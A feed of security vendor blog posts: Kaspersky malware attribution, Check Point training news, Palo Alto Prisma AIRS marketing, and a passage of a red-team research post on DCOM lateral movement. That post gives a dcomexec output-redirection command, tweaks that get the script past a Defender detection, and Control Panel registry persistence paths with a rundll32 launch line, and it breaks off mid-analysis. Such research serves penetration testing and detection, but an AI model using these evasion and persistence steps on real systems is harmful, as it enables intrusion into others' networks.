The second attribution method is handled via static code analysis (though keep in mind that this type of attribution is always problematic). The core idea here is to cluster even slightly overlapping malware files based on specific unique characteristics. Before analysis can begin, the malware sample must be disassembled. The problem is that alongside the informative and useful bits, the recovered code contains a lot of noise. If the attribution algorithm takes this non-informative junk into account, any malware sample will end up looking similar to a great number of legitimate files, making quality attribution impossible. On the flip side, trying to only attribute malware based on the useful fragments but using a mathematically primitive method will only cause the false positive rate to go through the roof. Furthermore, any attribution result must be cross-checked for similarities with legitimate files โ€” and the quality of that check usually depends heavily on the vendorโ€™s technical capabilities.

Kasperskyโ€™s approach to attribution

Our products leverage a unique database of malware associated with specific hacking groups, built over more than 25 years. On top of that, we use a patented attribution algorithm based on static analysis of disassembled code. This allows us to determine โ€” with high precision, and even a specific probability percentage โ€” how similar an analyzed file is to known samples from a particular group. This way, we can form a well-grounded verdict attributing the malware to a specific threat actor. The results are then cross-referenced against a database of billions of legitimate files to filter out false positives; if a match is found with any of them, the attribution verdict is adjusted accordingly. This approach is the backbone of the Kaspersky Threat Attribution Engine, which powers the threat attribution service on the Kaspersky Threat Intelligence Portal.

Closing the Cyber Security Skills Gap: Check Point Partners with CompTIA

27 January 2026 at 13:00

The cyber security industry faces a critical challenge: a growing skills gap that leaves organizations exposed to increasingly sophisticated threats. Businesses need qualified professionals who can secure systems and respond effectively, but finding and training those experts remains a global concern. To address this challenge, Infinity Global Services, which delivers practical learning designed to build real-world cyber security expertise, has partnered with CompTIA, a global leader in IT and cyber security education. This collaboration combines Infinity Global Servicesโ€™ hands-on training approach with CompTIAโ€™s globally recognized certifications, creating a powerful pathway for professionals to advance their careers and organizations to build [โ€ฆ]

The post Closing the Cyber Security Skills Gap: Check Point Partners with CompTIA appeared first on Check Point Blog.

Prisma AIRS Secures the Power of Factoryโ€™s Software Development Agents

The New Frontier of Agentic Development: Accelerating Developer Productivity

The world of software development is undergoing a rapid transformation, driven by the rise of AI agents and autonomous tools. Factory is advancing this shift through agent-native development, a new paradigm where developers focus on high-level design and agents, called Droids, handle the execution. Designed to support work across the software development lifecycle, these agents enable a new mode of development, delivering significant gains in speed and productivity, without sacrificing developer control.

As developer workflows increasingly rely on autonomous development agents, the way software is built evolves. This shift introduces important security considerations, such as prompt injection, sensitive data loss, unsafe URL access and malicious code execution, which, if left unaddressed, can undermine the very benefits these agents offer. Accelerating productivity depends not just on deploying agents, but on deploying them securely. This is where Palo Alto Networks, with its purpose-built AI security platform, Prismaยฎ AIRSโ„ข, plays a critical role.

The Productivity Paradox: Where Agents Introduce Risk

Autonomous agents operating across the software development lifecycle accelerate developer productivity, while also introducing a complex, language-driven threat surface that traditional security tools are not equipped to handle. As a result, new risks emerge, such as prompt injection or leaking secrets that extend beyond the visibility and control assumptions of traditional security approaches. Addressing these considerations is essential to preserving the benefits that agentic development provides.

Recognizing this shift, Palo Alto Networks has introduced targeted capabilities to accelerate secure development workflows. These efforts focus on three critical defense areas: preventing prompt injection, blocking sensitive data leaks and enabling robust malicious code detection capabilities, all of which are necessary to secure the full lifecycle of agent-driven systems.

The Solution: Securing Agentic Workflows for Acceleration

The solution is designed to convert security challenges directly into deployment confidence, dramatically accelerating productivity. By natively integrating Prisma AIRS within Factoryโ€™s Droid Shield Plus, the platform is able to inspect all large language model (LLM) interactions, including prompts, responses and subsequent tool calls, to enable comprehensive security across each interaction with the agent.

Prisma AIRS is a comprehensive platform designed to provide organizations with the visibility and control needed to safeguard AI agents across any environment. The platform continuously monitors agent behavior in real time to detect and prevent threats unique to agent-driven systems.

Droid Shield Plus key features: prompt injection detection, advanced secrets scanning, sensitive data protection, malicious code detection.
Droid Shield Plus, powered by Palo Alto Networks

How Security Drives Speed

Embedding security natively into the Factory platform enables two crucial outcomes. To start, it delivers a secure, agent-native development experience for every developer, fostering immediate trust in the integrity of the generated code and documentation. This assurance removes friction often associated with AI-powered workflows, which can accelerate enterprise adoption and scaling of the Factory platform across the organization.

When developers can trust the agents and the integrity of the generated code and documentation, they can innovate faster and deploy with greater confidence. Instead of waiting for security reviews or dealing with fragmentation, security is woven seamlessly into the development lifecycle.

Sequence of events from user to user with Prisma AIRS and Factory AI.
Factory-Prisma AIRS Integration Flow

The integration follows a clear API Intercept design pattern:

โ€ข When a user enters a prompt or initiates work in Factory, Prisma AIRS intercepts the workflow. If a malicious prompt is detected, the platform can add logic to coach or block the user.

โ€ข Similarly, after the LLM generates code, Prisma AIRS intercepts the generated content. If secrets are detected, the platform again adds logic to coach or block the result before it reaches Factory or the user.

This real-time inspection of prompts and generated code enables development teams to be protected against threats, such as privilege escalation, prompt injection and malicious code execution, without disrupting developer velocity.

Deploy Bravely

Prisma AIRS 2.0 establishes a unified foundation for scalable and secure AI innovation. By combining Factoryโ€™s agent-native development platform with the threat detection capabilities of Palo Alto Networks Prisma AIRS, organizations gain a powerful advantage. Together, this approach helps organizations adopt agentic development with confidence by embedding security directly into the development experience.

For enterprises looking to confidently scale AI automation and realize the immense productivity gains offered by Factoryโ€™s Droids, integrating Prisma AIRS is the next step. This combined approach enables teams to "Deploy Bravely." To learn more about this strategic partnership and integration, see our latest integration announcement and review the Droid Shield Plus integration documentation.


Key Takeaways for Secure Agentic Development

When adopting Factory with Prisma AIRS, enterprises realize immediate benefits that accelerate their AI strategy:

  1. Specialized Threat Defense
    Enterprises gain real-time, targeted protection against agent-specific threats, specifically prompt injection attacks and data leaks, which legacy tools cannot address.
  2. Native, Seamless Security
    Moving from a fragmented review process to a continuous, automated defense via API Interception, security enables compliance without slowing down development velocity.
  3. Deployment Confidence
    The native integration transforms security risks into operational assurance, accelerating the large-scale enterprise adoption and scaling of your Factory agent-native automation initiatives.

The post Prisma AIRS Secures the Power of Factoryโ€™s Software Development Agents appeared first on Palo Alto Networks Blog.

Palo Alto Networks Announces Support for NVIDIA Enterprise AI Factory

6 January 2026 at 00:01

Artificial intelligence has shifted to being the primary engine for market leadership. To compete, enterprises are shifting from general-purpose computing to AI factories, specialized infrastructures designed to manage the entire lifecycle of AI. However, this transition requires robust security without sacrificing performance and efficiency.

We are proud to announce that Palo Alto Networks Prismaยฎ AIRSโ„ข, accelerated on the NVIDIA BlueField data processing unit (DPU), is now part of the NVIDIA Enterprise AI Factory validated design.

The integrated solution embeds zero trust security directly into the AI infrastructure, providing comprehensive protection without impacting AI performance. By deploying Palo Alto Networks Prismaยฎ AIRSโ„ข Network Intercept directly onto the NVIDIA BlueField and extending to the cloud, Prisma AIRS establishes an essential zero trust governance fabric for the AI factory, enabling enterprises to accelerate innovation while maintaining control.

This critical architectural shift enables optimal AI performance and infrastructure efficiency by offloading security processing to an isolated domain, while leveraging the DPU's hardware acceleration via NVIDIA DOCA to enforce security policies at line speed. The implementation also leverages real-time workload information captured using DOCA Argus, which is then passed to Cortex XSIAMยฎ where it is used for AI-driven responses using the Cortex XSOARยฎ orchestration platform.

Rich Campagna, SVP Product Management, Palo Alto Networks said:

The AI Factory is the new engine for value creation, and securing it is a board-level imperative. The validation of Palo Alto Networks Prisma AIRS accelerated with NVIDIA BlueField within the NVIDIA Enterprise AI Factory enables a new security architecture for the AI era. We are embedding trust directly into the infrastructure, giving leaders the confidence to safeguard their proprietary intelligence and deploy AI bravely.

Kevin Deierling, senior vice president of Networking at NVIDIA said:

AI is transforming every industry and security must evolve to protect AI factories. To be scalable, security must be distributed and embedded within the AI infrastructure. This is achieved with NVIDIA BlueField running Palo Alto Networks Prisma AIRS to deliver robust, runtime security for the AI factory, with optimal AI performance and efficiency.

Deploy AI Bravely with a Future-Proof Foundation

The Future of Secure AI Factories

NVIDIA AI Factory with Prisma AIRS and Strata.

In addition to deploying Palo Alto Networks Prisma AIRS on NVIDIA BlueField in a distributed model, itโ€™s essential to maintain a centralized Hyperscale Security Firewall (HSF) cluster at the ingress and egress points of the AI factory to enforce a defense-in-depth strategy. Beyond network segmentation, individual workloads can selectively route traffic through hyperscale clusters to detect advanced application-layer threats and prevent lateral movement. These hyperscale firewall clusters scale elastically with demand, delivering session resiliency and the high availability required for critical AI operations.

This architecture fundamentally improves the Total Cost of Ownership (TCO) for AI infrastructure. By isolating security functions on BlueField, enterprises enable 100% of host computing resources to be dedicated to AI applications. This elimination of resource contention allows the AI Factory to maximize token throughput and capital efficiency.

This validated design is the blueprint for immediate efficiency. It provides a seamless path for enterprises to shift from general-purpose clusters to secure AI factory infrastructure without costly overhauls. More importantly, this collaboration establishes an unparalleled roadmap for future-proofing your investment. By securing operations with the high-performance NVIDIA BlueField-3 today, the architecture is inherently ready for the next generation, NVIDIA BlueField-4. This forward compatibility helps AI factories immediately handle gigascale demands, scaling up to 6X the compute power and doubling the bandwidth when BlueField-4 becomes available.

The inclusion of the Palo Alto Networks Prisma AIRS platform in the NVIDIA Enterprise AI Factory Validated Design bolsters enterprise AI security. By establishing the zero trust governance fabric of Prisma AIRS runtime security on NVIDIA BlueField, organizations gain a comprehensive defense. Proprietary and sensitive data is secured throughout the entire stack, and models are protected from adversarial threats, such as prompt injection attacks. With Prisma AIRS, the world's most comprehensive AI security platform, leaders gain the confidence to innovate and deploy AI bravely. This validated design is the essential blueprint for securely accelerating your market leadership without compromising security.

Join our "How to Secure the AI Factory" breakout session atย NVIDIA GTC 2026, March 16-19, in San Jose, CA to hear more about this transformative solution and accelerate your AI innovation securely.

The post Palo Alto Networks Announces Support for NVIDIA Enterprise AI Factory appeared first on Palo Alto Networks Blog.

Opening the Automation Garden: API Request & Webhook Trigger in Infinity Playblocks

9 January 2026 at 13:00

Todayโ€™s security teams work in complex, multi-tool environments. Alerts flow from SIEMs, tickets are created in ITSM platforms, actions occur in cloud and network controls, and workflows span countless third-party services. To keep pace, automation must be open, flexible, and seamlessly connected across every system that matters. Weโ€™re excited to introduce two powerful new capabilities in Infinity Playblocks that take us one step closer to a truly open automation ecosystem: API Request Step and Webhook Trigger. Together, they unlock a new open garden approach to security automation โ€“ where Infinity Playblocks seamlessly integrates with any system, inbound or outbound, without [โ€ฆ]

The post Opening the Automation Garden: API Request & Webhook Trigger in Infinity Playblocks appeared first on Check Point Blog.

The Power of Unity

Transforming Real-Time Protection with Cloud-Delivered Security Services

Discover how unified prevention provides IT leaders with real-time protection across every attack surface.

The line between innovation and exposure has never been blurred in todayโ€™s hyperconnected digital world. Every new device, application and cloud workload expands the modern attack surface, creating endless opportunities for adversaries who are scaling faster and becoming more sophisticated than ever before. The threat landscape is no longer defined by isolated malware or phishing emails. The modern attack surface has evolved into a dynamic, adaptive ecosystem, driven by automation and artificial intelligence. Traditional security is no longer enough against AI-powered adversaries; protecting the modern attack surface demands a unified, intelligent Cloud-Delivered Security Services (CDSS) platform.

Attackers have learned to weaponize the same innovations that once gave defenders an advantage. Generative AI now enables them to craft convincing phishing messages, generate polymorphic malware that changes with every delivery, and automate reconnaissance at an unprecedented scale. Ransomware groups operate with the speed and agility of modern startups, using AI to identify weaknesses while staying one step ahead of detection. The result is an era where breaches unfold in minutes rather than days. Organizations are left with little room for error, underscoring the urgent need for security that goes beyond traditional approaches.

The Power of a Unified, Cloud-Delivered Security Service Platform

The power of our Cloud-Delivered Security Services lies in our ability to bring together every layer of protection into a single, intelligent, connected system. This unified platform combines Advanced Threat Prevention, Advanced WildFireยฎ (AWF), Advanced DNS Security (ADNS) and Advanced URL Filtering (AURL) into a single AI-powered fabric that operates at the speed of the cloud.

Powered by Precision AIยฎ, this framework delivers real-time contextual awareness across every stage of the attack lifecycle. It continuously analyzes billions of signals across networks, users and applications to transform raw data into actionable insights. This capability enables organizations to move from reactive detection to proactive prevention, stopping threats before they can disrupt operations.

Every day, our CDSS services analyze up to 5.43 billion new events, detect nearly 8.95 million never-before-seen attacks, and block up to 30.9 billion threats inline. This scale of visibility is strengthened by AI thatโ€™s trained on shared threat data from more than 70,000 customers, creating a powerful network effect that delivers patient-zero prevention everywhere. This depth of intelligence provides the visibility and context needed to understand and stop even the most sophisticated attacks as they evolve.

CDSS services prevent zero day injection, evasive malware, phishing, DNS hijacking attacks.
CDSS Advanced Core Security Services

Shared telemetry flows naturally across services, helping ensure threats are detected and prevented without operating in silos. A phishing domain identified by Advanced DNS Security can immediately inform Advanced URL Filtering to block the malicious site. When Advanced WildFire uncovers a new zero-day technique or malicious artifact, that intelligence is shared instantly across the CDSS intelligence layer. Inline services, like Advanced Threat Prevention and Advanced URL Filtering, are enabled to strengthen protections in real time without manual intervention.

For IT leaders and security teams, this unified approach delivers comprehensive visibility and protection that keeps pace with their environment. Continuous intelligence adapts as conditions change, reducing complexity and improving operational efficiency. With consistent policy enforcement, faster decision-making and unified management across the enterprise, organizations can shift their focus from maintenance to innovation and growth.

The Moment Traditional Security Stopped Being Enough

There was a time when traditional network security was enough. Perimeter defenses and signature-based tools could reliably detect and block most threats before they caused harm. For years, this layered approach gave organizations a sense of confidence and control. But that moment has passed.

Our Unit 42ยฎ team has found that attacks are now faster, more sophisticated and more disruptive than ever, with 86% of major incidents in 2024 resulting in business disruption. This shift underscores how quickly traditional defenses are being outpaced and why yesterdayโ€™s security models no longer match todayโ€™s threat landscape.

Traditional, siloed architectures simply cannot keep up with modern attackers. What once served as a strong defense is now outmatched by adversaries who use AI to move faster and slip through the cracks of static security controls. Attackers no longer need to rely on predictable patterns or known exploits. They can use machine learning to probe defenses, mimic legitimate activity and disguise malicious activity within normal traffic, allowing them to bypass systems once they are considered unbreakable.

Older security products that depend on static signatures or manual policy updates cannot match this speed and scale. They respond to what has already happened, not to what is happening right now. By the time a new rule is written or a patch is applied, the threat has already evolved. Fragmented visibility and delayed response times give adversaries the upper hand, leaving IT teams defending blind against threats that adapt and shift faster than their defenses ever could.

In an effort to compensate, many organizations continue to add more tools: One for web filtering, one for DNS, one for malware analysis and one for data protection. While each solution provides value, they rarely work together. The result is an overcomplicated ecosystem of disconnected products that create visibility gaps, duplicate alerts, inconsistent policy enforcement and operational overhead. These gaps are exactly where attackers find their opportunity.

The moment traditional security stopped being enough was the moment attackers learned to think and move like machines. The rise of AI-powered threats marked the end of static defense and the beginning of a new kind of warfare, one that demands prevention and is predictive, adaptive and unified.

Today, enterprises donโ€™t need more point products. They need a single, intelligent security fabric so they can see, understand and act across every vector, from DNS to SaaS to endpoint, in one coordinated motion. Attackers increasingly weaponize GenAI to craft more evasive phishing pages, malware and domain infrastructures. So, security teams must rely on defenses that can counter these techniques in real time by effectively battling AI with AI.

That is where cloud-delivered security services (CDSS) redefine the game, bringing AI-driven prevention to every corner of the network.

Your Defense Is Only as Strong as Whatโ€™s Enabled

Having the proper security tools is only part of the equation. Real protection comes when those tools are fully enabled, integrated and working together to secure the organization. Cloud-delivered security services deliver their greatest value when they are live and continuously analyzing traffic, sharing intelligence and adapting in real time to support the business.

Too often, organizations have the right capabilities in place but leave them underutilized or inactive. Protection begins the moment each service is turned on and working in unison to deliver real-time prevention at scale. Ensuring that these capabilities are fully enabled and actively defending the network is what turns investment into impact.

Prevention is about readiness, not reaction. The most resilient organizations are those that activate early, integrate completely and allow automation to amplify what human oversight cannot. When IT leaders enable Advanced Threat Prevention, AWF, ADNS and AURL, prevention becomes continuous, intelligent and aligned with the pace of modern threats.

The power of our CDSS lies in both their advanced technology and the unity they create. Together, these services form an intelligent defense that connects detection, prevention and response into one seamless operation, all powered by Precision AI.

Powering all core security services with Precision AI.
Precision AI Foundation for Advanced Security Services

Now, with AI reshaping both innovation and risk, CDSS helps organizations stay confidently ahead. IT leaders who enable these capabilities strengthen visibility, simplify operations and elevate their overall security posture.

Fully enable your defenses and have them ready to prevent threats at each stage of the attack lifecycle. Learn more about activating CDSS through Strataโ„ข Cloud manager or speak with your Palo Alto Networks representative to see how unified, AI-powered prevention can strengthen your organizationโ€™s security posture.


Key Takeaways

  1. Traditional Security Is Insufficient Against Modern Threats
    The rise of AI and automation has created an era in which attackers move faster and are more sophisticated than traditional, siloed security products can handle, leading to an increasing number of major incidents that disrupt business.
  2. Unified Cloud-Delivered Security Services (CDSS) Are Necessary for Proactive Prevention
    Protecting the modern attack surface requires a single, intelligent, connected CDSS platform that unifies all layers of protection (e.g., Advanced Threat Prevention, AWF, ADNS, AURL) into an AI-powered fabric, enabling proactive, real-time prevention rather than reactive detection.
  3. Real Protection Depends on Full Activation and Integration
    Having the right security tools is only part of the solution. The greatest value and protection are realized when your fully enabled CDSS is integrated and working in unison to continuously analyze traffic and share intelligence.

The post The Power of Unity appeared first on Palo Alto Networks Blog.

Cyber Resilience Starts with Training: Why Skills Define Security Success

30 December 2025 at 13:00

Define Security Success Organizations face an escalating threat landscape and a widening cyber security skills gap. Compliance-driven training alone cannot prepare teams for real-world challenges like incident response, SOC operations, and threat hunting. Without robust, practical training, defenses weaken, and vulnerabilities multiply. Recent data from Cybrary โ€“ a leading cyber security training platform โ€“ shows how modern approaches are transforming readiness. Cybrary specializes in practical, role-based learning for security professionals. Through its partnership with Check Pointโ€™s Infinity Global Services, organizations gain access to structured programs that combine industry-recognized certifications, hands-on labs, and customized learning paths. The Impact of Cyber Security [โ€ฆ]

The post Cyber Resilience Starts with Training: Why Skills Define Security Success appeared first on Check Point Blog.

Yet another DCOM object for lateral movement

19 December 2025 at 09:00

Introduction

If youโ€™re a penetration tester, you know that lateral movement is becoming increasingly difficult, especially in well-defended environments. One common technique for remote command execution has been the use of DCOM objects.

Over the years, many different DCOM objects have been discovered. Some rely on native Windows components, others depend on third-party software such as Microsoft Office, and some are undocumented objects found through reverse engineering. While certain objects still work, others no longer function in newer versions of Windows.

This research presents a previously undescribed DCOM object that can be used for both command execution and potential persistence. This new technique abuses older initial access and persistence methods through Control Panel items.

First, we will discuss COM technology. After that, we will review the current state of the Impacket dcomexec script, focusing on objects that still function, and discuss potential fixes and improvements, then move on to techniques for enumerating objects on the system. Next, we will examine Control Panel items, how adversaries have used them for initial access and persistence, and how these items can be leveraged through a DCOM object to achieve command execution.

Finally, we will cover detection strategies to identify and respond to this type of activity.

COM/DCOM technology

What is COM?

COM stands for Component Object Model, a Microsoft technology that defines a binary standard for interoperability. It enables the creation of reusable software components that can interact at runtime without the need to compile COM libraries directly into an application.

These software components operate in a clientโ€“server model. A COM object exposes its functionality through one or more interfaces. An interface is essentially a collection of related member functions (methods).

COM also enables communication between processes running on the same machine by using local RPC (Remote Procedure Call) to handle cross-process communication.

Terms

To ensure a better understanding of its structure and functionality, letโ€™s revise COM-related terminology.

  1. COM interface
    A COM interface defines the functionality that a COM object exposes. Each COM interface is identified by a unique GUID known as the IID (Interface ID). All COM interfaces can be found in the Windows Registry under HKEY_CLASSES_ROOT\Interface, where they are organized by GUID.
  2. COM class (COM CoClass)
    A COM class is the actual implementation of one or more COM interfaces. Like COM interfaces, classes are identified by unique GUIDs, but in this case the GUID is called the CLSID (Class ID). This GUID is used to locate the COM server and activate the corresponding COM class.

    All COM classes must be registered in the registry under HKEY_CLASSES_ROOT\CLSID, where each classโ€™s GUID is stored. Under each GUID, you may find multiple subkeys that serve different purposes, such as:

    • InprocServer32/LocalServer32: Specifies the system path of the COM server where the class is defined. InprocServer32 is used for in-process servers (DLLs), while LocalServer32 is used for out-of-process servers (EXEs). Weโ€™ll describe this in more detail later.
    • ProgID: A human-readable name assigned to the COM class.
    • TypeLib: A binary description of the COM class (essentially documentation for the class).
    • AppID: Used to describe security configuration for the class.
  3. COM server
    A COM is the module where a COM class is defined. The server can be implemented as an EXE, in which case it is called an out-of-process server, or as a DLL, in which case it is called an in-process server. Each COM server has a unique file path or location in the system. Information about COM servers is stored in the Windows Registry. The COM runtime uses the registry to locate the server and perform further actions. Registry entries for COM servers are located under the HKEY_CLASSES_ROOT root key for both 32- and 64-bit servers.
Component Object Model implementation

Component Object Model implementation

Clientโ€“server model

  1. In-process server
    In the case of an in-process server, the server is implemented as a DLL. The client loads this DLL into its own address space and directly executes functions exposed by the COM object. This approach is efficient since both client and server run within the same process.
    In-process COM server

    In-process COM server

  2. Out-of-process server
    Here, the server is implemented and compiled as an executable (EXE). Since the client cannot load an EXE into its address space, the server runs in its own process, separate from the client. Communication between the two processes is handled via ALPC (Advanced Local Procedure Call) ports, which serve as the RPC transport layer for COM.
Out-of-process COM server

Out-of-process COM server

What is DCOM?

DCOM is an extension of COM where the D stands for Distributed. It enables the client and server to reside on different machines. From the userโ€™s perspective, there is no difference: DCOM provides an abstraction layer that makes both the client and the server appear as if they are on the same machine.

Under the hood, however, COM uses TCP as the RPC transport layer to enable communication across machines.

Distributed COM implementation

Distributed COM implementation

Certain requirements must be met to extend a COM object into a DCOM object. The most important one for our research is the presence of the AppID subkey in the registry, located under the COM CLSID entry.

The AppID value contains a GUID that maps to a corresponding key under HKEY_CLASSES_ROOT\AppID. Several subkeys may exist under this GUID. Two critical ones are:

  • AccessPermission: controls access permissions.
  • LaunchPermission: controls activation permissions.

These registry settings grant remote clients permissions to activate and interact with DCOM objects.

Lateral movement via DCOM

After attackers compromise a host, their next objective is often to compromise additional machines. This is what we call lateral movement. One common lateral movement technique is to achieve remote command execution on a target machine. There are many ways to do this, one of which involves abusing DCOM objects.

In recent years, many DCOM objects have been discovered. This research focuses on the objects exposed by the Impacket script dcomexec.py that can be used for command execution. More specifically, three exposed objects are used: ShellWindows, ShellBrowserWindow and MMC20.

  1. ShellWindows
    ShellWindows was one of the first DCOM objects to be identified. It represents a collection of open shell windows and is hosted by explorer.exe, meaning any COM client communicates with that process.

    In Impacketโ€™s dcomexec.py, once an instance of this COM object is created on a remote machine, the script provides a semi-interactive shell.

    Each time a user enters a command, the function exposed by the COM object is called. The command output is redirected to a file, which the script retrieves via SMB and displays back to simulate a regular shell.

    Internally, the script runs this command when connecting:

    cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__17602 2>&1

    This sets the working directory to C:\ and redirects the output to the ADMIN$ share under the filename __17602. After that, the script checks whether the file exists; if it does, execution is considered successful and the output appears as if in a shell.

    When running dcomexec.py against Windows 10 and 11 using the ShellWindows object, the script hangs after confirming SMB connection initialization and printing the SMB banner. As I mentioned in my personal blog post, it appears that this DCOM object no longer has permission to write to the ADMIN$ share. A simple fix is to redirect the output to a directory the DCOM object can write to, such as the Temp folder. The Temp folder can then be accessed under the same ADMIN$ share. A small change in the code resolves the issue. For example:

    OUTPUT_FILENAME = 'Temp\\__' + str(time.time())[:5]

  2. ShellBrowserWindow
    The ShellBrowserWindow object behaves almost identically to ShellWindows and exhibits the same behavior on Windows 10. The same workaround that we used for ShellWindows applies in this case. However, on Windows 11, this object no longer works for command execution.
  3. MMC20
    The MMC20.Application COM object is the automation interface for Microsoft Management Console (MMC). It exposes methods and properties that allow MMC snap-ins to be automated.

    This object has historically worked across all Windows versions. Starting with Windows Server 2025, however, attempting to use it triggers a Defender alert, and execution is blocked.

    As shown in earlier examples, the dcomexec.py script writes the command output to a file under ADMIN$, with a filename that begins with __:

    OUTPUT_FILENAME = '__' + str(time.time())[:5]

    Defender appears to check for files written under ADMIN$ that start with __, and when it detects one, it blocks the process and alerts the user. A quick fix is to simply remove the double underscores from the output filename.

    Another way to bypass this issue is to use the same workaround used for ShellWindows โ€“ redirecting the output to the Temp folder. The table below outlines the status of these objects across different Windows versions.

    Windows Server 2025 Windows Server 2022 Windows 11 Windows 10
    ShellWindows Doesnโ€™t work Doesnโ€™t work Works but needs a fix Works but needs a fix
    ShellBrowserWindow Doesnโ€™t work Doesnโ€™t work Doesnโ€™t work Works but needs a fix
    MMC20 Detected by Defender Works Works Works

Enumerating COM/DCOM objects

The first step to identifying which DCOM objects could be used for lateral movement is to enumerate them. By enumerating, I donโ€™t just mean listing the objects. Enumeration involves:

  • Finding objects and filtering specifically for DCOM objects.
  • Identifying their interfaces.
  • Inspecting the exposed functions.

Automating enumeration is difficult because most COM objects lack a type library (TypeLib). A TypeLib acts as documentation for an object: which interfaces it supports, which functions are exposed, and the definitions of those functions. Even when TypeLibs are available, manual inspection is often still required, as we will explain later.

There are several approaches to enumerating COM objects depending on their use cases. Next, weโ€™ll describe the methods I used while conducting this research, taking into account both automated and manual methods.

  1. Automation using PowerShell
    In PowerShell, you can use .NET to create and interact with DCOM objects. Objects can be created using either their ProgID or CLSID, after which you can call their functions (as shown in the figure below).
    Shell.Application COM object function list in PowerShell

    Shell.Application COM object function list in PowerShell

    Under the hood, PowerShell checks whether the COM object has a TypeLib and implements the IDispatch interface. IDispatch enables late binding, which allows runtime dynamic object creation and function invocation. With these two conditions met, PowerShell can dynamically interact with COM objects at runtime.

    Our strategy looks like this:

    As you can see in the last box, we perform manual inspection to look for functions with names that could be of interest, such as Execute, Exec, Shell, etc. These names often indicate potential command execution capabilities.

    However, this approach has several limitations:

    • TypeLib requirement: Not all COM objects have a TypeLib, so many objects cannot be enumerated this way.
    • IDispatch requirement: Not all COM objects implement the IDispatch interface, which is required for PowerShell interaction.
    • Interface control: When you instantiate an object in PowerShell, you cannot choose which interface the instance will be tied to. If a COM class implements multiple interfaces, PowerShell will automatically select the one marked as [default] in the TypeLib. This means that other non-default interfaces, which may contain additional relevant functionality, such as command execution, could be overlooked.
  2. Automation using C++
    As you might expect, C++ is one of the languages that natively supports COM clients. Using C++, you can create instances of COM objects and call their functions via header files that define the interfaces.However, with this approach, we are not necessarily interested in calling functions directly. Instead, the goal is to check whether a specific COM object supports certain interfaces. The reasoning is that many interfaces have been found to contain functions that can be abused for command execution or other purposes.

    This strategy primarily relies on an interface called IUnknown. All COM interfaces should inherit from this interface, and all COM classes should implement it.The IUnknown interface exposes three main functions. The most important is QueryInterface(), which is used to ask a COM object for a pointer to one of its interfaces.So, the strategy is to:

    • Enumerate COM classes in the system by reading CLSIDs under the HKEY_CLASSES_ROOT\CLSID key.
    • Check whether they support any known valuable interfaces. If they do, those classes may be leveraged for command execution or other useful functionality.

    This method has several advantages:

    • No TypeLib dependency: Unlike PowerShell, this approach does not require the COM object to have a TypeLib.
    • Use of IUnknown: In C++, you can use the QueryInterface function from the base IUnknown interface to check if a particular interface is supported by a COM class.
    • No need for interface definitions: Even without knowing the exact interface structure, you can obtain a pointer to its virtual function table (vtable), typically cast as a void*. This is enough to confirm the existence of the interface and potentially inspect it further.

    The figure below illustrates this strategy:

    This approach is good in terms of automation because it eliminates the need for manual inspection. However, we are still only checking well-known interfaces commonly used for lateral movement, while potentially missing others.

  3. Manual inspection using open-source tools

    As you can see, automation can be difficult since it requires several prerequisites and, in many cases, still ends with a manual inspection. An alternative approach is manual inspection using a tool called OleViewDotNet, developed by James Forshaw. This tool allows you to:
    • List all COM classes in the system.
    • Create instances of those classes.
    • Check their supported interfaces.
    • Call specific functions.
    • Apply various filters for easier analysis.
    • Perform other inspection tasks.
    Open-source tool for inspecting COM interfaces

    Open-source tool for inspecting COM interfaces

    One of the most valuable features of this tool is its naming visibility. OleViewDotNet extracts the names of interfaces and classes (when available) from the Windows Registry and displays them, along with any associated type libraries.

    This makes manual inspection easier, since you can analyze the names of classes, interfaces, or type libraries and correlate them with potentially interesting functionality, for example, functions that could lead to command execution or persistence techniques.

Control Panel items as attack surfaces

Control Panel items allow users to view and adjust their computer settings. These items are implemented as DLLs that export the CPlApplet function and typically have the .cpl extension. Control Panel items can also be executables, but our research will focus on DLLs only.

Control Panel items

Control Panel items

Attackers can abuse CPL files for initial access. When a user executes a malicious .cpl file (e.g., delivered via phishing), the system may be compromised โ€“ a technique mapped to MITRE ATT&CK T1218.002.

Adversaries may also modify the extensions of malicious DLLs to .cpl and register them in the corresponding locations in the registry.

  • Under HKEY_CURRENT_USER:
    HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls
  • Under HKEY_LOCAL_MACHINE:
    • For 64-bit DLLs:
      HKLM\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls
    • For 32-bit DLLs:
      HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Control Panel\Cpls

These locations are important when Control Panel DLLs need to be available to the current logged-in user or to all users on the machine. However, the โ€œControl Panelโ€ subkey and its โ€œCplsโ€ subkey under HKCU should be created manually, unlike the โ€œControl Panelโ€ and โ€œCplsโ€ subkeys under HKLM, which are created automatically by the operating system.

Once registered, the DLL (CPL file) will load every time the Control Panel is opened, enabling persistence on the victimโ€™s system.

Itโ€™s worth noting that even DLLs that do not comply with the CPL specification, do not export CPlApplet, or do not have the .cpl extension can still be executed via their DllEntryPoint function if they are registered under the registry keys listed above.

There are multiple ways to execute Control Panel items:

  • From cmd: control.exe [filename].cpl
  • By double-clicking the .cpl file.

Both methods use rundll32.exe under the hood:

rundll32.exe shell32.dll,Control_RunDLL [filename].cpl

This calls the Control_RunDLL function from shell32.dll, passing the CPL file as an argument. Everything inside the CPlApplet function will then be executed.

However, if the CPL file has been registered in the registry as shown earlier, then every time the Control Panel is opened, the file is loaded into memory through the COM Surrogate process (dllhost.exe):

COM Surrogate process loading the CPL file

COM Surrogate process loading the CPL file

What happened was that a Control Panel with a COM client used a COM object to load these CPL files. We will talk about this COM object in more detail later.

The COM Surrogate process was designed to host COM server DLLs in a separate process rather than loading them directly into the client processโ€™s address space. This isolation improves stability for the in-process server model. This hosting behavior can be configured for a COM object in the registry if you want a COM server DLL to run inside a separate process because, by default, it is loaded in the same process.

โ€˜DCOMingโ€™ through Control Panel items

While following the manual approach of enumerating COM/DCOM objects that could be useful for lateral movement, I came across a COM object called COpenControlPanel, which is exposed through shell32.dll and has the CLSID {06622D85-6856-4460-8DE1-A81921B41C4B}. This object exposes multiple interfaces, one of which is IOpenControlPanel with IID {D11AD862-66DE-4DF4-BF6C-1F5621996AF1}.

IOpenControlPanel interface in the OleViewDotNet output

IOpenControlPanel interface in the OleViewDotNet output

I immediately thought of its potential to compromise Control Panel items, so I wanted to check which functions were exposed by this interface. Unfortunately, neither the interface nor the COM class has a type library.

COpenControlPanel interfaces without TypeLib

COpenControlPanel interfaces without TypeLib

